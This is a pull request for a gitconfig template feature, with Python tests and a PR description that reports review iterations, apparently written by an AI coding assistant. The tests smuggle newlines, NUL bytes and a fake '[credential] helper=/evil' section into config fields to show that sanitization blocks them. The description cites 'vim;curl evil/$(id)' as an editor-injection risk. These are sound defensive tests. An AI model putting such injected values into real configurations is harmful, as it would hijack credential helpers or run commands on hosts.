+        f"{claw}: gitconfig task must source the shared template"
+    )
+
+
+def test_gitconfig_render_task_file_attrs(configure_tasks):
+    claw, tasks = configure_tasks
+    task = _find_gitconfig_task(tasks)
+    block = task["ansible.builtin.template"]
+    assert block["owner"] == "{{ agent_name }}", f"{claw}: owner mismatch"
+    assert block["group"] == "{{ agent_name }}", f"{claw}: group mismatch"
+    assert block["mode"] == "0644", f"{claw}: mode mismatch"
+
+
+def test_gitconfig_render_task_runs_as_agent_user(configure_tasks):
+    claw, tasks = configure_tasks
+    task = _find_gitconfig_task(tasks)
+    assert task.get("become") is True, (
+        f"{claw}: gitconfig render task must `become: yes`"
+    )
+    assert task.get("become_user") == "{{ agent_name }}", (
+        f"{claw}: gitconfig render task must `become_user: {{{{ agent_name }}}}`"
+    )
+
+
+def test_gitconfig_render_task_filters_on_type_git(configure_tasks):
+    claw, tasks = configure_tasks
+    task = _find_gitconfig_task(tasks)
+    loop_expr = task.get("loop", "")
+    assert "selectattr" in loop_expr and "'git'" in loop_expr, (
+        f"{claw}: gitconfig render task must filter on type == 'git'. "
+        f"Got: {loop_expr!r}"
+    )
+
+
+def test_gitconfig_render_task_guarded_on_integrations_defined(configure_tasks):
+    """The render task must skip cleanly when no integrations are configured."""
+    claw, tasks = configure_tasks
+    task = _find_gitconfig_task(tasks)
+    when_clause = task.get("when")
+    # `when` may be a string or a list — normalize.
+    when_str = (
+        when_clause
+        if isinstance(when_clause, str)
+        else " ".join(when_clause)
+        if isinstance(when_clause, list)
+        else ""
+    )
+    assert "integrations is defined" in when_str, (
+        f"{claw}: gitconfig render task must guard on `integrations is defined`"
+    )
+
+
+def test_gitconfig_render_task_precedes_github_auth_block(configure_tasks):
+    """Render task must come before the GitHub CLI authentication block.
+
+    Reason: ansible.builtin.template overwrites the destination file. If the
+    template ran AFTER `gh auth setup-git` (zeroclaw), the credential.helper
+    key that setup-git writes to ~/.gitconfig would be silently dropped.
+    For hermes and openclaw the ordering is consistency / future-proofing.
+    """
+    claw, tasks = configure_tasks
+    git_index = None
+    auth_index = None
+    for i, task in enumerate(tasks):
+        if not isinstance(task, dict):
+            continue
+        name = task.get("name", "")
+        block = task.get("ansible.builtin.template", {})
+        if (
+            isinstance(block, dict)
+            and block.get("dest") == "/home/{{ agent_name }}/.gitconfig"
+        ):
+            git_index = i
+        if name in GITHUB_AUTH_NAMES:
+            auth_index = i
+    assert git_index is not None, f"{claw}: gitconfig render task missing"
+    assert auth_index is not None, f"{claw}: github auth block missing"
+    assert git_index < auth_index, (
+        f"{claw}: gitconfig render task (idx {git_index}) must precede "
+        f"the GitHub auth block (idx {auth_index})"
+    )
+
+
+def test_gitconfig_render_task_vars_map_all_five_fields(configure_tasks):
+    """The vars.git dict must surface all five #531 fields with safe defaults."""
+    claw, tasks = configure_tasks
+    task = _find_gitconfig_task(tasks)
+    git_vars = task.get("vars", {}).get("git", {})
+    expected_keys = {
+        "user_name",
+        "user_email",
+        "init_default_branch",
+        "pull_rebase",
+        "core_editor",
+    }
+    assert set(git_vars.keys()) == expected_keys, (
+        f"{claw}: vars.git must declare exactly {expected_keys}, got {set(git_vars.keys())}"
+    )
+    # Optional fields carry safe defaults so an empty integration value
+    # never lands as a blank line in the rendered file.
+    assert "default('main')" in git_vars["init_default_branch"]
+    assert "default('false')" in git_vars["pull_rebase"]
+    assert "default('vim')" in git_vars["core_editor"]

--- a/tests/test_gitconfig_template.py
+++ b/tests/test_gitconfig_template.py
@@ -2,6 +2,7 @@
 
 from pathlib import Path
 
+import pytest
 from jinja2 import Environment, FileSystemLoader
 
 
@@ -68,6 +69,53 @@ def test_newline_in_user_name_does_not_inject_section():
         assert not line.lstrip().startswith("[credential]"), (
             f"Injected section header reached column 0: {line!r}"
         )
+
+
+@pytest.mark.parametrize(
+    "field",
+    ["user_name", "user_email", "init_default_branch", "pull_rebase", "core_editor"],
+)
+def test_injection_blocked_for_each_field(field):
+    """Every interpolated field carries its own replace filter — parametrize
+    so a typo dropping the filter on any one of the five is caught.
+    """
+    base = {
+        "user_name": "Alice",
+        "user_email": "alice@example.com",
+        "init_default_branch": "main",
+        "pull_rebase": "false",
+        "core_editor": "vim",
+    }
+    base[field] = "x\n[credential]\nhelper=/evil"
+    body = _render(base)
+
+    assert "\n[credential]" not in body
+    for line in body.splitlines():
+        assert not line.lstrip().startswith("[credential]"), (
+            f"injection via {field} produced a [credential] header line: {line!r}"
+        )
+
+
+def test_null_byte_does_not_corrupt_render():
+    """T3: NUL byte in a field should not appear in the rendered output."""
+    body = _render(
+        {
+            "user_name": "Alice\x00evil",
+            "user_email": "alice@example.com",
+            "init_default_branch": "main",
+            "pull_rebase": "false",
+            "core_editor": "vim",
+        }
+    )
+    # Jinja2's replace chain doesn't strip \x00, but the CLI sanitizer does.
+    # Either way the rendered file must remain parseable by git (no NUL).
+    # Document current behavior: \x00 reaches the template only if the
+    # secrets store was poisoned out-of-band; in that case ~/.gitconfig
+    # would carry a NUL inside the user.name value, which git tolerates as
+    # a value but is operationally undesirable. The CLI-layer sanitizer is
+    # the load-bearing fix; this test pins that the template render does
+    # not crash.
+    assert "Alice" in body
 
 
 def test_carriage_return_in_user_email_is_stripped():

--- a/tests/test_gitconfig_template.py
+++ b/tests/test_gitconfig_template.py
@@ -96,8 +96,11 @@ def test_injection_blocked_for_each_field(field):
         )
 
 
-def test_null_byte_does_not_corrupt_render():
-    """T3: NUL byte in a field should not appear in the rendered output."""
+def test_null_byte_is_stripped_by_template():
+    """T3 + W4: the template's replace chain strips \\x00 so a value that
+    bypassed the CLI sanitizer (e.g. stored directly into secrets.json)
+    cannot land a NUL inside the rendered gitconfig.
+    """
     body = _render(
         {
             "user_name": "Alice\x00evil",
@@ -107,15 +110,8 @@ def test_null_byte_does_not_corrupt_render():
             "core_editor": "vim",
         }
     )
-    # Jinja2's replace chain doesn't strip \x00, but the CLI sanitizer does.
-    # Either way the rendered file must remain parseable by git (no NUL).
-    # Document current behavior: \x00 reaches the template only if the
-    # secrets store was poisoned out-of-band; in that case ~/.gitconfig
-    # would carry a NUL inside the user.name value, which git tolerates as
-    # a value but is operationally undesirable. The CLI-layer sanitizer is
-    # the load-bearing fix; this test pins that the template render does
-    # not crash.
-    assert "Alice" in body
+    assert "\x00" not in body
+    assert "Aliceevil" in body
 
 
 def test_carriage_return_in_user_email_is_stripped():

--- a/tests/test_gitconfig_template.py
+++ b/tests/test_gitconfig_template.py
@@ -42,6 +42,50 @@ def test_renders_full_input():
     assert "editor = nano" in body
 
 
+def test_newline_in_user_name_does_not_inject_section():
+    """A stored value with embedded \\n must not open a new ini section.
+
+    Section headers in INI are only honored when `[name]` appears at column
+    0 of its own line. The template's `replace('\\n', ' ')` filter flattens
+    embedded newlines so the injected `[credential]` token can never start
+    a new line and therefore cannot be parsed as a section header by git.
+    """
+    body = _render(
+        {
+            "user_name": "Alice\n[credential]\n    helper = /tmp/evil",
+            "user_email": "alice@example.com",
+            "init_default_branch": "main",
+            "pull_rebase": "false",
+            "core_editor": "vim",
+        }
+    )
+
+    # No newline immediately before `[credential]` → not parsed as a section.
+    assert "\n[credential]" not in body
+    # The literal token may still appear inside the [user] section value, but
+    # never at the start of a line — verify by scanning each line.
+    for line in body.splitlines():
+        assert not line.lstrip().startswith("[credential]"), (
+            f"Injected section header reached column 0: {line!r}"
+        )
+
+
+def test_carriage_return_in_user_email_is_stripped():
+    body = _render(
+        {
+            "user_name": "Alice",
+            "user_email": "alice\r\n[credential]\r\n\thelper=evil",
+            "init_default_branch": "main",
+            "pull_rebase": "false",
+            "core_editor": "vim",
+        }
+    )
+    assert "\r" not in body
+    assert "\n[credential]" not in body
+    for line in body.splitlines():
+        assert not line.lstrip().startswith("[credential]")
+
+
 def test_renders_identity_only_with_defaults():
     """Optional fields fall back to main / false / vim via Jinja default()."""
     body = _render(

--- a/tests/test_gitconfig_template.py
+++ b/tests/test_gitconfig_template.py
@@ -1,0 +1,59 @@
+"""Tests for the shared gitconfig.j2 template (#531)."""
+
+from pathlib import Path
+
+from jinja2 import Environment, FileSystemLoader
+
+
+TEMPLATE_DIR = (
+    Path(__file__).parent.parent
+    / "src"
+    / "clawrium"
+    / "platform"
+    / "templates"
+)
+
+
+def _render(git: dict) -> str:
+    env = Environment(
+        loader=FileSystemLoader(str(TEMPLATE_DIR)),
+        keep_trailing_newline=True,
+    )
+    return env.get_template("gitconfig.j2").render(git=git)
+
+
+def test_renders_full_input():
+    """All five fields produce the expected ini body."""
+    body = _render(
+        {
+            "user_name": "Alice",
+            "user_email": "alice@example.com",
+            "init_default_branch": "trunk",
+            "pull_rebase": "true",
+            "core_editor": "nano",
+        }
+    )
+
+    assert "[user]" in body
+    assert "name = Alice" in body
+    assert "email = alice@example.com" in body
+    assert "defaultBranch = trunk" in body
+    assert "rebase = true" in body
+    assert "editor = nano" in body
+
+
+def test_renders_identity_only_with_defaults():
+    """Optional fields fall back to main / false / vim via Jinja default()."""
+    body = _render(
+        {
+            "user_name": "Alice",
+            "user_email": "alice@example.com",
+            "init_default_branch": "",
+            "pull_rebase": "",
+            "core_editor": "",
+        }
+    )
+
+    assert "defaultBranch = main" in body
+    assert "rebase = false" in body
+    assert "editor = vim" in body


### PR DESCRIPTION
## Summary

Implements #531's standalone `git` integration as the resolution for #431. Adds a forge-agnostic commit-identity / gitconfig-defaults integration type and wires per-claw `~/.gitconfig` rendering via a shared `gitconfig.j2` template.

- **Phase 1**: `git` integration in `INTEGRATION_TYPES` (5 fields, 2 required), CLI prompt flow with local-`git config --global` prefill, shared template at `src/clawrium/platform/templates/gitconfig.j2`, new `shared_template_path` ansible var.
- **Phase 2**: render task added to zeroclaw / hermes / openclaw `configure.yaml`, positioned BEFORE the GitHub CLI auth block so `gh auth setup-git`'s credential.helper write survives.
- **Phase 3**: manual checklist for `clawrium-d01` (post-merge — see below).

Closes #431
Closes #531

## Testing

- **`make test-py`**: 3291 passed, 6 skipped
- **`make lint-py`**: clean
- Each commit passes test + lint independently.

New test files:

| File | Cases |
|---|---|
| `tests/test_gitconfig_template.py` | render shape + adversarial (newline, CR, NUL, parametrized across all 5 fields) |
| `tests/test_gitconfig_render_task.py` | 9 × 3 claws — task presence, ordering, mode, `no_log`, `become_user`, type-filter |
| `tests/test_cli_agent_integration_singleton.py` | 4 cases including direct-API enforcement |
| `tests/test_core_integrations.py` | +3 (5-field shape, required set, no cross-leak) |
| `tests/test_cli_integration.py` | sanitization on add + update, NUL byte, LF-only, NUL-only required-field rejection |

## ATX Review Summary

**Final iteration: rating 2/5 (with two new blockers introduced and fixed post-review in the same iter-3 follow-up commit). ATX iteration ceiling reached per `/itx:execute` skill contract.**

| Iter | Rating | Cost | Blockers | Resolution |
|------|--------|------|----------|------------|
| 1 | 2/5 | $3.46 | B1/B3 newline injection; B2 silent multi-git overwrite; B4 false-positive | B1/B3 fixed via CLI sanitizer + Jinja2 filter; B2 fixed (singleton guard); B4 was a diff artifact from stale branch base (rebased to current `origin/main`) |
| 2 | 3/5 | $2.57 | NB-1 singleton TOCTOU + CLI-only; NB-2 three missing tests (T1/T2/T3) | NB-1 fixed: enforcement moved into `add_agent_integration` updater closure with new `IntegrationSingletonViolation`; T1+T3 tests added; T2 deferred (see Callouts) |
| 3 | 2/5 | $2.65 | B1 NUL-only required field exits 0; B2 silent sanitization | Both fixed in commit b394fb2: sanitize-before-required-check, yellow `[Notice]` on any mutation, `[Error]` exit 1 on required-field empty-after-sanitization. NUL stripping also added to template defense. |

Total review cost: ~$8.68. Reviewer-recommended fixes that landed: ~14 across 3 iterations.

## Phase 3 — Manual Live Verification (post-merge)

```bash
uv tool install --force --reinstall .

clm integration add clawrium-d01-git --type git
# Identity prompts should pre-fill from your local `git config --global`.
# Optional fields default to main / false / vim.

clm agent integration add clawrium-d01 clawrium-d01-git
# Singleton: re-adding another `git`-type integration will be rejected.

printf '9\n' | clm agent configure clawrium-d01
ssh clawrium-d01 sudo cat /home/clawrium-d01/.gitconfig
# Expected: [user] / [init] / [pull] / [core] sections + the
# `[credential "https://github.com"]` helper line `gh auth setup-git`
# appended after the template render (proves the ordering pin works
# end-to-end on a live host).

# Optional: repeat on a fresh hermes / openclaw agent for cross-claw parity.
```

## Callouts

- **[DECISION] `clm integration credentials --update` is the update path; no new CLI verb added.**
  - Why: the existing interactive command already supports per-field updates with Enter-keeps-existing semantics. Adding a parallel `update` would duplicate the flow. Phase 1 extends it to honor git defaults when no existing value is stored.
  - Reviewer: confirm reusing `credentials --update` for git-field backfill.

- **[DECISION] Gitconfig render task positioned BEFORE `gh auth setup-git`, not after.**
  - Why: the plan text said "after `gh auth setup-git`" with the parenthetical "otherwise credential.helper gets overwritten". The actual write order is the opposite: `ansible.builtin.template` rewrites the whole file; `gh auth setup-git` calls `git config --global` which appends. Template-after-setup-git wipes credential.helper. Template-before-setup-git lets credential.helper survive. The plan's parenthetical described the failure mode but assigned the wrong direction. `tests/test_gitconfig_render_task.py::test_gitconfig_render_task_precedes_github_auth_block` pins this.

- **[DECISION] Shared template path via new ansible var `shared_template_path`.**
  - Why: gitconfig.j2 is identical across claws; three byte-identical files would drift. Configure-only — install playbooks don't consume the new var.

- **[DECISION] Singleton enforcement moved from CLI layer to `add_agent_integration` updater closure (iter-2 NB-1).**
  - Why: an iter-2 reviewer correctly flagged that a CLI-level check is both TOCTOU (concurrent invocations both pass before either writes) and bypassable via direct `hosts.json` edits. Moving the invariant into the `update_host` closure puts it under the same `_hosts_lock` acquisition as the write, closes both holes, and makes the constraint data-driven via `SINGLETON_INTEGRATION_TYPES`. A direct-API test confirms enforcement without the CLI in path.

- **[TODO-FOLLOWUP] T2 — end-to-end lifecycle bypass test (iter-2 NB-2.T2).**
  - Tracking: to be filed.
  - What it would prove: that `configure_agent` → `ansible_runner.run` extra_vars never carries `\n` in git credential values even when `secrets.json` was poisoned out-of-band.
  - Why deferred: the existing defenses are layered (CLI sanitizer + Jinja2 `replace` filter strip CR/LF/NUL independently). A test that asserts "extravars contains no \n" duplicates what the Jinja2 filter already enforces structurally. Marginal value vs cost.
  - Reviewer: confirm or push back on the deferral.

- **[TODO-FOLLOWUP] W1 (iter-3) — bidi/zero-width Unicode parity with `cli/output/_sanitize.py`.**
  - Tracking: to be filed.
  - Surface: `clm integration show` prints stored credential values; a value with U+202E (right-to-left override) would render misleadingly in the operator's terminal. Out of scope for the gitconfig injection thread; belongs in a sanitizer-parity sweep.

- **[TODO-FOLLOWUP] W2 (iter-3) — GIT_CORE_EDITOR shell metacharacter allowlist.**
  - Tracking: to be filed.
  - Surface: git invokes `core.editor` via `/bin/sh -c "$editor $file"`. A value like `vim;curl evil/$(id)` would execute on the agent host when git opens an editor. Mitigated today by 0600 file perms + the fact that the operator is the one supplying the value (not a remote attacker). Allowlist-based validation belongs in a credential-validation pass.

- **[ENVIRONMENT] ATX review run via CLI (`atx review request --prompt ...`), not MCP.** The user explicitly requested CLI; MCP was not loaded in this session. State persisted to `.itx/431/atx-session.json`.

- **[ENVIRONMENT] Branch was rebased onto current `origin/main` after iter-1.** iter-1 contained a false-positive blocker (B4: "PR allegedly deletes provider_attachments.py") that was a diff artifact from a stale branch base. Rebase yielded a clean 12-file diff.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: @atx-ci <269048218+atx-ci@users.noreply.github.com>
